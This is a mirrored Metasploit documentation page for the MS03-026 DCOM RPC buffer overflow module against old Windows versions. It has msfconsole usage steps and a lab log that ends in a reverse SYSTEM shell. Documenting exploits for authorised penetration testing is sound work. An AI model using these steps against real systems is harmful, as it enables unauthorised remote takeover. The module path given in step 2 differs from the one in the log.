CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/dcerpc/ms03_026_dcom.md
Views: 1904

Vulnerable Application

This module exploits a stack buffer overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request 😃

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/windows/smb/ms03_026_dcom

  3. Do: set rhosts <rhosts>

  4. Do: run

  5. You should get a SYSTEM shell.

Options

Scenarios

Windows 2000 Server SP4 (English)

msf6 exploit(windows/dcerpc/ms03_026_dcom) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.164:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 172.16.191.164:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.191.164[135] ...
[*] 172.16.191.164:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.191.164
[*] Command shell session 1 opened (172.16.191.192:4444 -> 172.16.191.164:1027 ) at 2021-11-27 23:52:35 -0500


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
-----
          

C:\WINNT\system32>